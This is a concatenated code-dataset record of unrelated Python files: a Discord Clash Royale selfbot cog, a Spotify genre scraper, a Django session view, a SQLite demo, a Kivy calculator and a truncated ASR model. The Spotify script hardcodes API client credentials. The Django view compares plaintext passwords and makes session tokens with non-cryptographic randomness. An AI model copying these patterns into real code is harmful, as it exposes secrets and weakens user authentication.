pickle.load(fin)\n\n with open(vectorizer_path, 'rb') as fin:\n vectorizer = pickle.load(fin)\n \n plot_svm_binary_classification_viz(vectorizer, model)\n\nif __name__ == \"__main__\":\n # train_individual(mode=\"regression\")\n # train_individual(mode=\"classification\")\n # train_time_series(mode=\"classification\")\n plot_feature_importance()\n\n","repo_name":"ralucaginga/ERISK-2022","sub_path":"train_test_light.py","file_name":"train_test_light.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24826858512","text":"import discord\nfrom discord.ext import commands\nimport crasync\nimport aiohttp\nimport json\nimport os\n\n\nclass Profile:\n '''Get info about your Profile'''\n\n def __init__(self, bot):\n self.bot = bot\n with open('data/config.json') as f:\n config = json.load(f)\n if 'TAG' not in config:\n tag = None\n else:\n tag = config['TAG']\n self.tag = os.environ.get('TAG') or tag\n self.client = crasync.Client()\n\n def cdir(self, obj):\n return [x for x in dir(obj) if not x.startswith('_')]\n\n def get_chests(self, ctx, p):\n cycle = p.chest_cycle\n pos = cycle.position\n chests = p.get_chest(0).title() + '\\n'\n chests += '\\n'.join([p.get_chest(x).title() for x in range(1, 8)])\n special = ''\n for i, attr in enumerate(self.cdir(cycle)):\n if attr != 'position':\n e = attr.replace('_', '')\n if getattr(cycle, attr):\n c_pos = int(getattr(cycle, attr))\n until = c_pos - pos\n special += f'{e.title()}+{until} '\n return (chests, special)\n\n @commands.command()\n async def profile(self, ctx, tag=None):\n '''Fetch a Clash Royale Profile'''\n em = discord.Embed(title='Profile')\n em.color = await ctx.get_dominant_color(ctx.author.avatar_url)\n\n if tag is None:\n tag = self.tag\n if tag is None:\n em.description - 'Please add `TAG` to your config.'\n return await ctx.send(embed=em)\n tag = tag.strip('#').replace('O', '0')\n try:\n profile = await self.client.get_profile(tag)\n except:\n em.description = 'Either the API is down or that\\'s an invalid tag.'\n return await ctx.send(embed=em)\n\n try:\n clan = await profile.get_clan()\n except ValueError:\n pass\n\n if profile.global_rank is not None:\n global_rank = str(profile.global_rank)\n else:\n global_rank = 'Unranked'\n\n level = str(profile.level)\n experience = str(profile.experience[0]) + '/' + str(profile.experience[1])\n trophies = str(profile.current_trophies)\n highest_trophies = str(profile.highest_trophies)\n legend_trophies = str(profile.legend_trophies)\n arena = profile.arena.name\n win_streak = str(profile.win_streak)\n\n donations = str(profile.total_donations)\n win_percent = f'{(profile.wins / (profile.wins + profile.losses)*100):.3f}%'\n record = str(profile.wins) + '-' + str(profile.draws) + '-' + str(profile.losses)\n av = profile.clan_badge_url or 'https://i.imgur.com/Y3uXsgj.png'\n\n chests = self.get_chests(ctx, profile)[0]\n cycle = profile.chest_cycle\n pos = cycle.position\n special = ''\n\n s = None\n if profile.seasons:\n s = profile.seasons[0]\n global_r = s.end_global\n season = f\"Highest: {s.highest} trophies\\n\" \\\n f\"Finish: {s.ending} trophies\\n\" \\\n f\"Global Rank: {global_r}\"\n else:\n season = None\n\n special = self.get_chests(ctx, profile)[1]\n shop_offers = ''\n if profile.shop_offers.legendary:\n shop_offers += f\"Legendary Chest: {profile.shop_offers.legendary} days\\n\"\n if profile.shop_offers.epic:\n shop_offers += f\"Epic Chest: {profile.shop_offers.epic} days\\n\"\n if profile.shop_offers.arena:\n shop_offers += f\"Arena: {profile.shop_offers.arena} days\\n\"\n\n deck = ''\n for card in profile.deck:\n deck += f'{card.name}: Lvl {card.level}\\n'\n\n em.title = profile.name\n em.description = f'#{tag}'\n em.url = f'http://cr-api.com/profile/{tag}'\n em.set_author(name='Profile', icon_url=av)\n\n em.add_field(name='Level', value=level + ' (' + experience + ')')\n em.add_field(name='Arena', value=arena)\n\n em.add_field(name='Trophies', value=trophies +\n '/' + highest_trophies + '(PB)/' + legend_trophies + ' Legend')\n em.add_field(name='Global Rank', value=global_rank)\n em.add_field(name='Total Donations', value=donations)\n em.add_field(name='Win Percentage', value=win_percent)\n em.add_field(name='Max Challenge Wins', value=str(profile.max_wins))\n em.add_field(name='Favorite Card', value=profile.favourite_card)\n em.add_field(name='Game Record (Win Streak)', value=record + ' (' + win_streak + ')')\n\n if profile.clan_role:\n em.add_field(name='Clan Info', value=clan.name +\n '\\n#' + clan.tag + '\\n' + profile.clan_role)\n else:\n em.add_field(name='Clan Info', value='No clan')\n\n em.add_field(name='Tournament Cards Won', value=str(profile.tournament_cards_won))\n em.add_field(name='Challenge Cards Won', value=str(profile.challenge_cards_won))\n em.add_field(name='Battle Deck', value=deck)\n em.add_field(name=f'Chests (Total {pos} opened)', value=chests)\n em.add_field(name='Chests Until', value=special)\n em.add_field(name='Shop Offers', value=shop_offers)\n if s:\n em.add_field(name=f'Previous Season Results (Season {s.number})', value=season)\n else:\n pass\n\n em.set_thumbnail(url=profile.arena.image_url)\n em.set_footer(text='Selfbot made by SharpBit | Powered by cr-api',\n icon_url='http://cr-api.com/static/img/branding/cr-api-logo.png')\n\n await ctx.send(embed=em)\n\n @commands.command()\n async def trophies(self, ctx, tag=None):\n '''See your current, record, and legend trophies'''\n em = discord.Embed(title='Trophies')\n em.color = await ctx.get_dominant_color(ctx.author.avatar_url)\n\n if tag is None:\n tag = self.tag\n if tag is None:\n em.description - 'Please add `TAG` to your config.'\n return await ctx.send(embed=em)\n try:\n profile = await self.client.get_profile(tag)\n except:\n em.description = 'Either the API is down or that\\'s an invalid tag.'\n return await ctx.send(embed=em)\n\n trophies = str(profile.current_trophies)\n highest_trophies = str(profile.highest_trophies)\n legend_trophies = str(profile.legend_trophies)\n\n em.title = profile.name\n em.set_author(\n name='Trophies', icon_url='http://clashroyalehack1.com/wp-content/uploads/2017/06/coctrophy.png')\n em.description = 'Trophies: `' + trophies + '`\\nPersonal Best: `' + \\\n highest_trophies + '`\\nLegend Trophies: `' + legend_trophies + '`'\n em.set_thumbnail(\n url='http://vignette1.wikia.nocookie.net/clashroyale/images/7/7c/LegendTrophy.png/revision/latest?cb=20160305151655')\n em.set_footer(text='Selfbot made by SharpBit | Powered by cr-api',\n icon_url='http://cr-api.com/static/img/branding/cr-api-logo.png')\n\n await ctx.send(embed=em)\n\n @commands.command()\n async def deck(self, ctx, tag=None):\n '''View a player's deck'''\n em = discord.Embed(title='Battle Deck')\n em.color = await ctx.get_dominant_color(ctx.author.avatar_url)\n\n if tag is None:\n tag = self.tag\n if tag is None:\n em.description - 'Please add `TAG` to your config.'\n return await ctx.send(embed=em)\n try:\n profile = await self.client.get_profile(tag)\n except:\n em.description = 'Either the API is down or that\\'s an invalid tag.'\n return await ctx.send(embed=em)\n\n deck = ''\n for card in profile.deck:\n deck += f'{card.name}: Lvl {card.level}\\n'\n\n em.title = profile.name\n em.set_author(name='Battle Deck', icon_url=ctx.author.avatar_url)\n em.description = deck\n em.set_thumbnail(\n url='https://cdn.discordapp.com/emojis/376367875965059083.png')\n em.set_footer(text='Selfbot made by SharpBit | Powered by cr-api',\n icon_url='http://cr-api.com/static/img/branding/cr-api-logo.png')\n\n await ctx.send(embed=em)\n\n @commands.command()\n async def weburl(self, ctx, tag=None):\n '''Get the cr-api.com url for a tag'''\n em = discord.Embed(title='cr-api.com URL')\n em.color = await ctx.get_dominant_color(ctx.author.avatar_url)\n if tag is None:\n tag = self.tag\n if tag is None:\n em.description - 'Please add `TAG` to your config.'\n return await ctx.send(embed=em)\n try:\n profile = await self.client.get_profile(tag)\n except:\n em.description = 'Either the API is down or that\\'s an invalid tag.'\n return await ctx.send(embed=em)\n\n em.url = f'http://cr-api.com/profile/{tag}'\n em.title = profile.name\n em.add_field(name='URL', value=f'http://cr-api.com/profile/{tag}')\n em.set_footer(text='Selfbot made by SharpBit | Powered by cr-api',\n icon_url='http://cr-api.com/static/img/branding/cr-api-logo.png')\n\n await ctx.send(embed=em)\n\n\ndef setup(bot):\n bot.add_cog(Profile(bot))\n","repo_name":"Garcia1008/selfstats","sub_path":"cogs/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":9381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"42726156175","text":"import spotipy\nimport json\nimport h5py\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport sqlite3\nfrom copy import deepcopy\nfrom datetime import datetime\n\n\nconn = sqlite3.connect('/users/bclark66/sp_data_for_tempo_test1922.db')\ncur = conn.cursor()\n\nclient_credentials_manager = SpotifyClientCredentials(client_id=\"e90c5ed628d443819c60714f29cc8186\",client_secret=\"e7632ab680d44aa3ab55434315075309\")\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\nregional_words = {'chinese', 'taiwan', 'traditional', 'dutch', 'euro', 'israeli', 'swedish', 'celtic',\n'italian', 'french', 'argentine', 'latin', 'spanish', 'czech', 'luxembourgian', 'brazilian', 'hungarian',\n'arab', 'german', 'danish', 'icelandic', 'glam', 'norwegian', 'turkish', 'irish', 'colombian',\n'iraqi', 'thai', 'dominican', 'indian', 'persian', 'lebanese', 'polish', 'chilean', 'sertanejo',\n'swiss', 'belarusian', 'bolivian', 'italo', 'garifuna', 'manila', 'vietnamese', 'indo', 'indonesian',\n'singaporean', 'greek', 'pakistani', 'breton', 'syrian', 'mexican', 'finnish', 'pagan', 'viking',\n'quebec', 'russian', 'romanian', 'wellington', 'cumbia', 'baile', 'latvian', 'serbian', 'slovak',\n'regional', 'suomi', 'japanese', 'croatian', 'lithuanian', 'euskal', 'perth', 'estonian', 'bahamian',\n'guinean', 'mande', 'belgian', 'yugoslav', 'portuguese', 'baltic', 'african', 'armenian', 'kosovan',\n'jewish', 'medieval', 'rune', 'brit', 'slovenian', 'sudanese', 'malian', 'ilocano', 'gothenburg',\n'pinoy', 'anime', 'korean', 'austrian', 'welsh', 'beninese', 'tunisian', 'slavic', 'algerian',\n'bulgarian', 'malaysian', 'puerto', 'rican', 'concepcion', 'maltese', 'bristol', 'galician', 'ecuadorian',\n'cook', 'islands', 'polynesian', 'peruvian', 'catalan', 'montreal', 'venezuelan', 'basque', 'panamanian',\n'nordic', 'rome', 'punjabi', 'paraguayan', 'albanian', 'national'}\n\nclassical_words = ['classical','romantic','orchestra','baroque', 'chamber','early music','opera', ]\njazz_words = ['jazz','big band','bebop','bop','fusion','swing','boogie','Dixieland','jive']\nrock_words = ['rock','metal','indie','punk','disco','reggae', 'grunge','funk','screamo','emo']\nblues_words = ['blues']\ncountry_words = ['country','folk','traditional']\nhip_hop_words = ['hip-hop','rap','trap','hip hop']\nelectronic_words = ['electronica','techno','electro','house','industrial','trance']\ndef flatten_dict(d, result={}, prv_keys=[]):\n for k, v in d.items():\n #print(\"k \",k)\n if isinstance(v, dict):\n flatten_dict(v, result, prv_keys + [k])\n else:\n result['.'.join(prv_keys + [k])] = v\n\n return result\n\ndef get_artist_id(yr,c,term,category):\n if len(term.split(\" \")) > 1:\n query = 'genre:' + '\"' + term + '\" ' + yr\n else:\n query = 'genre:' + term + ' year:' + yr\n results = sp.search(query,type='track',limit=50)\n flat_result = flatten_dict(results)\n #print(flat_result.keys())\n #print(flat_result[\"tracks.total\"],\" \",flat_result[\"tracks.next\"],\" \",flat_result[\"tracks.offset\"])\n \n total = flat_result[\"tracks.total\"]\n \n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n \n print(\"starting year: \",yr,current_time,term,total)\n \n current = 0\n track_count = 0\n track_count_needed = c\n \n\n while current < total:\n try:\n results = sp.search(query,type='track',limit=50,offset=current)\n except Exception as toomany:\n #print(\"# of albums \",current,\" # of tracks \",track_count,toomany)\n #yr,new_current,new_classical_tracks_count,new_jazz_tracks_count,new_rock_tracks_count,new_hip_hop_tracks_count = get_artist_id(yr,c,jz,r,h)\n # classical_tracks_count += new_classical_tracks_count\n # jazz_tracks_count += new_jazz_tracks_count\n # rock_tracks_count += new_rock_tracks_count\n # hip_hop_tracks_count += new_hip_hop_tracks_count\n break\n\n flat_result = flatten_dict(results)\n x = 0\n \n\n for item in flat_result[\"tracks.items\"]:\n #print(\"keys\",item.keys())\n if 'Live' in item['name'] or 'live' in item['name']:\n #print(\"live\",item['name'])\n continue\n ts = []\n #print(\"album\",item['id'])\n if int(item[\"album\"]['release_date'][0:4]) != int(yr):\n #print(\"actual date\",int(item[\"album\"]['release_date'][0:4]))\n continue\n all_genres = []\n for artist in item[\"artists\"]:\n try: \n current_artist = sp.artist(artist[\"id\"])\n current_genres = current_artist[\"genres\"]\n for g in current_genres:\n all_genres = all_genres + current_genres\n except Exception as bad_artist:\n print(\"bad_artist for\",item[\"id\"], bad_artist)\n continue\n if term not in all_genres:\n #print(\"wrong genre\",all_genres)\n continue\n\n\n\n ts.append(item[\"id\"])\n ts.append(item['uri'])\n ts.append(item['duration_ms'])\n ts.append(item['type'])\n ts.append(item[\"name\"])\n ts.append(item['popularity'])\n ts.append(item['explicit'])\n ts.append(item['href'])\n ts.append(term)\n ts.append(int(yr))\n ts.append(category)\n \n \n \n try:\n #print(\"about to insert album\",ts[0])\n cur.execute('insert into track values (?,?,?,?,?,?,?,?,?,?,?)',ts)\n conn.commit()\n except Exception as badtrack: \n print(\"bad track\",badtrack)\n continue \n track_count += 1\n if track_count > c:\n break \n\n # # c.executemany('insert into track_artist VALUES (?,?,?)', ta)\n # i += 1 \n offset = flat_result[\"tracks.offset\"]\n if track_count > c:\n break\n \n current += 50\n #print(current)\n \n return(yr,current,track_count)\ni = 0\n#for row in c2.execute('SELECT artist_name,count(*) FROM songs group by artist_id order by 2 desc'):\n#for row in c2.execute('select tan.track_id, count(*) from track_search tan left outer join track_analysis ta on ta.track_id = tan.track_id and ta.track_id is null group by tan.track_id'):\n # if i > 60:\n # break\n # #print(row)\n # artist = row[0]\n # get_artist_id(artist)\n # i += 1\njazz_needs = [[1974,7],[1978,9],[1979,15],[1980,39],[1981,23],[1982,13],[1983,17],[1984,20],[1985,2]]\nyr = \"1980\"\nfor needed_year in range(1920,2021):\n needed_count = 100\n for term in classical_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'classical')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in jazz_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'jazz')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in rock_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'rock')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in blues_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'blues')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in country_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'country')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in hip_hop_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'hip hop')\n needed_count -= count\n if needed_count <= 0:\n break\n needed_count = 100\n for term in electronic_words:\n yr,current,count = get_artist_id(str(needed_year),needed_count,term,'electronic')\n needed_count -= count\n if needed_count <= 0:\n break\n# for row in c.execute('select distinct track_id from track_artist where track_id not in (select distinct track_id from track_analysis)'):\n# trks.append(row[0])\n#print(trks)\n\n","repo_name":"Computational-Cognitive-Musicology-Lab/tempo_stability","sub_path":"code/get_tracks_by_genre.py","file_name":"get_tracks_by_genre.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4407789369","text":"import random\r\nimport string\r\nfrom django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom .models import Sesiones\r\nfrom docente.models import Docente\r\nfrom estudiante.models import Estudiante\r\nfrom .serializers import ItemSesion\r\nfrom docente.serializers import CargarDocenteSesion\r\nfrom estudiante.serializers import CargarEstudianteSesion\r\nfrom rest_framework import generics\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\n\r\n@api_view(['POST'])\r\ndef iniciar_sesion(request):\r\n \"\"\"\r\n List all code Usuarios, or create a new Estudiante.\r\n \"\"\"\r\n print(request.data)\r\n if request.data['rol'] == 2:\r\n print(\"Entró a docente\")\r\n try:\r\n usuario = Docente.objects.get(idInicioSesion=request.data['username'], contrasena=request.data['password'])\r\n except Docente.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n \"\"\" serializerDocente = CargarDocenteSesion(docente, context={'request': request})\r\n usuario = serializerDocente.data \"\"\"\r\n if request.data['rol'] == 3:\r\n try:\r\n usuario = Estudiante.objects.get(idInicioSesion=request.data['username'], contrasena=request.data['password'])\r\n except Estudiante.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n \"\"\" serializerEstudiante = CargarEstudianteSesion(estudiante, context={'request': request})\r\n usuario = serializerEstudiante.data \"\"\"\r\n print(usuario)\r\n try:\r\n sesion = Sesiones.objects.get(rol=request.data['rol'], idUsuario=usuario.id)\r\n serializerSesion = ItemSesion(sesion)\r\n return Response(serializerSesion.data, status=status.HTTP_200_OK)\r\n except Sesiones.DoesNotExist:\r\n token = get_random_string(20)\r\n serializerSesion = ItemSesion(data={\r\n 'token': token,\r\n 'rol': request.data['rol'],\r\n 'idUsuario': usuario.id\r\n })\r\n if serializerSesion.is_valid():\r\n serializerSesion.save()\r\n return Response(serializerSesion.data, status=status.HTTP_201_CREATED)\r\n print(serializerSesion.errors)\r\n return Response(serializerSesion.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['POST'])\r\ndef cerrar_sesion(request):\r\n \"\"\"\r\n List all code Usuarios, or create a new Estudiante.\r\n \"\"\"\r\n try:\r\n sesion = Sesiones.objects.get(token=request.data['token'])\r\n sesion.delete()\r\n return Response({}, status=status.HTTP_200_OK)\r\n except Sesiones.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\ndef get_random_string(length):\r\n # Random string with the combination of lower and upper case\r\n letters = string.ascii_letters\r\n result_str = ''.join(random.choice(letters) for i in range(length))\r\n return result_str","repo_name":"ivangutierrezr/api-aprendecontuprofe","sub_path":"aprendecontuprofeapi/sesiones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24803135486","text":"from conection import Conection\n\nconn = Conection()\n\n## Create table and insert data\n\ncreate_table_string = '''\nCREATE TABLE PRODUCTS (\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n ARTICLE_NAME VARCHAR(50) UNIQUE, \n PRICE INTEGER, \n SECTION VARCHAR(20)\n)'''\ninsert_data = \"INSERT INTO PRODUCTS VALUES('TV',15,'SPORTS')\"\n\n#conn.makeQuery(create_table_string)\n\nproducts_list = [\n (\"T-Shirt\", 10,\"Sports\"),\n (\"Trousers\", 30,\"Formal\"),\n (\"Socks\", 2,\"Sports\")\n]\nquery = \"INSERT INTO PRODUCTS VALUES(NULL,?,?,?)\"\n\nconn.makeQuery(query,products_list)\n\n## Get values from database\n\nquery_select = \"SELECT * FROM PRODUCTS\"\nproduct_query_list = conn.getList(query_select)\nprint(product_query_list)\n\nquery_object = \"SELECT * FROM PRODUCTS WHERE id=1\"\nresult_object = conn.getList(query_object)\nvalue = result_object[0][2]\nprint(result_object)\n\n## update objects\n\nquery_update = f'UPDATE PRODUCTS SET PRICE = {value + 10} WHERE ID = 1'\nconn.makeQuery(query_update)\nresult_object = conn.getList(query_object)\nprint(result_object)\n\n## delete products\n\nquery_delete = 'DELETE FROM PRODUCTS WHERE ID > 3'\nconn.makeQuery(query_delete)\nproduct_query_list = conn.getList(query_select)\nprint(product_query_list)\n\nconn.finish()","repo_name":"jdanielcl/python_databases_sqlite","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71128615825","text":"from kivy.app import App\nfrom kivy.uix.label import Label\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button \n\nclass MyLabel(Label):\n\tdef __init__(self,**kwargs):\n\t\tLabel.__init__(self,**kwargs)\n\t\tself.bind(size=self.setter('text_size'))\n\t\tself.padding=(20,20)\n\t\tself.font_size=24\n\t\tself.halign='center'\n\t\tself.valign='middle'\n\n\nclass Investment(App):\n\n\tdef build(self):\n\t\tlayout= GridLayout(cols=2,row_force_default=True, row_default_height=40)\n\t\t\n\t\tl1=MyLabel(text=\"Investment Amount\")\n\t\tlayout.add_widget(l1)\n\t\t\n\t\tself.t1 = TextInput(text = \"0\", multiline = False,width=150)\n\t\tlayout.add_widget(self.t1)\n\t\t\n\t\tl2=MyLabel(text=\"Monthly Interest Rate\")\n\t\tlayout.add_widget(l2)\n\t\t\n\t\tself.t2 = TextInput(text = \"0\", multiline = False,width=150)\n\t\tlayout.add_widget(self.t2)\n\t\t\n\t\tl3=MyLabel(text=\"Years\")\n\t\tlayout.add_widget(l3)\n\t\t\n\t\tself.t3 = TextInput(text = \"0\", multiline = False,width=150)\n\t\tlayout.add_widget(self.t3)\n\n\t\tpass \n\t\t\n\t\t\n\t\tl4=MyLabel(text=\"Future Value\")\n\t\tlayout.add_widget(l4)\n\t\t\n\t\tself.l5=MyLabel(text=\"$0.00\",width=150)\n\t\tlayout.add_widget(self.l5)\n\t\t\n\t\tpass\n\t\t\n\t\tbtn = Button(text=\"Calculate\", on_press=self.calculate, font_size=24)\n\t\tlayout.add_widget(btn)\n\t\t\n\t\texit = Button(text=\"Exit\", on_press=self.quit_app, font_size=24)\n\t\tlayout.add_widget(exit)\n\t\t\n\t\t\n\t\treturn layout \n\n\tdef calculate(self, instance):\n\t\tinv_amt = float(self.t1.text)\n\t\tyears = float(self.t3.text)\n\t\tmth_int_rate = float(self.t2.text)\n\t\tself.txt_future_val=inv_amt*(1+mth_int_rate)**(12*years)\n\t\tself.l5.text = \"$%.2f\" %(self.txt_future_val)\n\t\t\n\tdef quit_app(self, value):\n\t\tApp.get_running_app().stop()\n\t\texit()\n\n\n\nInvestment().run()","repo_name":"justiniansiah/10.009-Digital-Word","sub_path":"Week 11/cs3_investment.py","file_name":"cs3_investment.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4455276085","text":"import math\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions.categorical import Categorical\n\nfrom src.util import init_weights, init_gate\nfrom src.module import VGGExtractor, CNNExtractor, RNNLayer, ScaleDotAttention, LocationAwareAttention\n\n\nclass ASR(nn.Module):\n ''' ASR model, including Encoder/Decoder(s)'''\n\n def __init__(self, input_size, vocab_size, init_adadelta, ctc_weight, encoder, attention, decoder, emb_drop=0.0):\n super(ASR, self).__init__()\n\n # Setup\n assert 0 <= ctc_weight <= 1\n self.vocab_size = vocab_size\n self.ctc_weight = ctc_weight\n self.enable_ctc = ctc_weight > 0\n self.enable_att = ctc_weight != 1\n self.lm = None\n\n # Modules\n self.encoder = Encoder(input_size, **encoder)\n if self.enable_ctc:\n self.ctc_layer = nn.Linear(self.encoder.out_dim, vocab_size)\n if self.enable_att:\n self.dec_dim = decoder['dim']\n self.pre_embed = nn.Embedding(vocab_size, self.dec_dim)\n self.embed_drop = nn.Dropout(emb_drop)\n self.decoder = Decoder(\n self.encoder.out_dim+self.dec_dim, vocab_size, **decoder)\n query_dim = self.dec_dim*self.decoder.layer\n self.attention = Attention(\n self.encoder.out_dim, query_dim, **attention)\n\n # Init\n if init_adadelta:\n self.apply(init_weights)\n if self.enable_att:\n for l in range(self.decoder.layer):\n bias = getattr(self.decoder.layers, 'bias_ih_l{}'.format(l))\n bias = init_gate(bias)\n\n def set_state(self, prev_state, prev_attn):\n ''' Setting up all memory states for beam decoding'''\n self.decoder.set_state(prev_state)\n self.attention.set_mem(prev_attn)\n\n def create_msg(self):\n # Messages for user\n msg = []\n msg.append('Model spec.| Encoder\\'s downsampling rate of time axis is {}.'.format(\n self.encoder.sample_rate))\n if self.encoder.vgg:\n msg.append(\n ' | VGG Extractor w/ time downsampling rate = 4 in encoder enabled.')\n if self.encoder.cnn:\n msg.append(\n ' | CNN Extractor w/ time downsampling rate = 4 in encoder enabled.')\n if self.enable_ctc:\n msg.append(' | CTC training on encoder enabled ( lambda = {}).'.format(\n self.ctc_weight))\n if self.enable_att:\n msg.append(' | {} attention decoder enabled ( lambda = {}).'.format(\n self.attention.mode, 1-self.ctc_weight))\n return msg\n\n def forward(self, audio_feature, feature_len, decode_step, tf_rate=0.0, teacher=None,\n emb_decoder=None, get_dec_state=False):\n '''\n Arguments\n audio_feature - [BxTxD] Acoustic feature with shape \n feature_len - [B] Length of each sample in a batch\n decode_step - [int] The maximum number of attention decoder steps \n tf_rate - [0,1] The probability to perform teacher forcing for each step\n teacher - [BxL] Ground truth for teacher forcing with sentence length L\n emb_decoder - [obj] Introduces the word embedding decoder, different behavior for training/inference\n At training stage, this ONLY affects self-sampling (output remains the same)\n At inference stage, this affects output to become log prob. with distribution fusion\n get_dec_state - [bool] If true, return decoder state [BxLxD] for other purpose\n '''\n # Init\n bs = audio_feature.shape[0]\n ctc_output, att_output, att_seq = None, None, None\n dec_state = [] if get_dec_state else None\n\n # Encode\n encode_feature, encode_len = self.encoder(audio_feature, feature_len)\n\n # CTC based decoding\n if self.enable_ctc:\n ctc_output = F.log_softmax(self.ctc_layer(encode_feature), dim=-1)\n\n # Attention based decoding\n if self.enable_att:\n # Init (init char = , reset all rnn state and cell)\n self.decoder.init_state(bs)\n self.attention.reset_mem()\n last_char = self.pre_embed(torch.zeros(\n (bs), dtype=torch.long, device=encode_feature.device))\n att_seq, output_seq = [], []\n\n # Preprocess data for teacher forcing\n if teacher is not None:\n teacher = self.embed_drop(self.pre_embed(teacher))\n\n # Decode\n for t in range(decode_step):\n # Attend (inputs current state of first layer, encoded features)\n attn, context = self.attention(\n self.decoder.get_query(), encode_feature, encode_len)\n # Decode (inputs context + embedded last character)\n decoder_input = torch.cat([last_char, context], dim=-1)\n cur_char, d_state = self.decoder(decoder_input)\n # Prepare output as input of next step\n if (teacher is not None):\n # Training stage\n if (tf_rate == 1) or (torch.rand(1).item() <= tf_rate):\n # teacher forcing\n last_char = teacher[:, t, :]\n else:\n # self-sampling (replace by argmax may be another choice)\n with torch.no_grad():\n if (emb_decoder is not None) and emb_decoder.apply_fuse:\n _, cur_prob = emb_decoder(\n d_state, cur_char, return_loss=False)\n else:\n cur_prob = cur_char.softmax(dim=-1)\n sampled_char = Categorical(cur_prob).sample()\n last_char = self.embed_drop(\n self.pre_embed(sampled_char))\n else:\n # Inference stage\n if (emb_decoder is not None) and emb_decoder.apply_fuse:\n _, cur_char = emb_decoder(\n d_state, cur_char, return_loss=False)\n # argmax for inference\n last_char = self.pre_embed(torch.argmax(cur_char, dim=-1))\n\n # save output of each step\n output_seq.append(cur_char)\n att_seq.append(attn)\n if get_dec_state:\n dec_state.append(d_state)\n\n att_output = torch.stack(output_seq, dim=1) # BxTxV\n att_seq = torch.stack(att_seq, dim=2) # BxNxDtxT\n if get_dec_state:\n dec_state = torch.stack(dec_state, dim=1)\n\n return ctc_output, encode_len, att_output, att_seq, dec_state\n\n\nclass Decoder(nn.Module):\n ''' Decoder (a.k.a. Speller in LAS) '''\n # ToDo: More elegant way to implement decoder\n\n def __init__(self, input_dim, vocab_size, module, dim, layer, dropout):\n super(Decoder, self).__init__()\n self.in_dim = input_dim\n self.layer = layer\n self.dim = dim\n self.dropout = dropout\n\n # Init\n assert module in ['LSTM', 'GRU'], NotImplementedError\n self.hidden_state = None\n self.enable_cell = module == 'LSTM'\n\n # Modules\n self.layers = getattr(nn, module)(\n input_dim, dim, num_layers=layer, dropout=dropout, batch_first=True)\n self.char_trans = nn.Linear(dim, vocab_size)\n self.final_dropout = nn.Dropout(dropout)\n\n def init_state(self, bs):\n ''' Set all hidden states to zeros '''\n device = next(self.parameters()).device\n if self.enable_cell:\n self.hidden_state = (torch.zeros((self.layer, bs, self.dim), device=device),\n torch.zeros((self.layer, bs, self.dim), device=device))\n else:\n self.hidden_state = torch.zeros(\n (self.layer, bs, self.dim), device=device)\n return self.get_state()\n\n def set_state(self, hidden_state):\n ''' Set all hidden states/cells, for decoding purpose'''\n device = next(self.parameters()).device\n if self.enable_cell:\n self.hidden_state = (hidden_state[0].to(\n device), hidden_state[1].to(device))\n else:\n self.hidden_state = hidden_state.to(device)\n\n def get_state(self):\n ''' Return all hidden states/cells, for decoding purpose'''\n if self.enable_cell:\n return (self.hidden_state[0].cpu(), self.hidden_state[1].cpu())\n else:\n return self.hidden_state.cpu()\n\n def get_query(self):\n ''' Return state of all layers as query for attention '''\n if self.enable_cell:\n return self.hidden_state[0].transpose(0, 1).reshape(-1, self.dim*self.layer)\n else:\n return self.hidden_state.transpose(0, 1).reshape(-1, self.dim*self.layer)\n\n def forward(self, x):\n ''' Decode and transform into vocab '''\n if not self.training:\n self.layers.flatten_parameters()\n x, self.hidden_state = self.layers(x.unsqueeze(1), self.hidden_state)\n x = x.squeeze(1)\n char = self.char_trans(self.final_dropout(x))\n return char, x\n\n\nclass Attention(nn.Module):\n ''' Attention mechanism\n please refer to http://www.aclweb.org/anthology/D15-1166 section 3.1 for more details about Attention implementation\n Input : Decoder state with shape [batch size, decoder hidden dimension]\n Compressed feature from Encoder with shape [batch size, T, encoder feature dimension]\n Output: Attention score with shape [batch size, num head, T (attention score of each time step)]\n Context vector with shape [batch size, encoder feature dimension]\n (i.e. weighted (by attention score) sum of all timesteps T's feature) '''\n\n def __init__(self, v_dim, q_dim, mode, dim, num_head, temperature, v_proj,\n 